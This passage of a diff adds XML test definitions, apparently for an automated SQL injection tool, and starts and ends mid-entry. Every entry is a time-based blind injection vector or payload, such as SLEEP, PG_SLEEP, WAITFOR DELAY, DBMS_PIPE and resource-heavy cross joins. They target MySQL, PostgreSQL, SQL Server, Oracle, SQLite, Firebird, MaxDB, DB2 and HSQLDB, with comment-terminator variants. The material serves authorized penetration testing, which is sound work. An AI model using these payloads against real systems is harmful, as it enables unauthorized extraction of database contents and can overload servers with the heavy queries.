+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 AND time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+    
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
+    <!-- End of AND time-based blind tests -->
+
+    <!-- OR time-based blind tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR time-based blind</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+    
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>    
+    
+    <test>
+        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
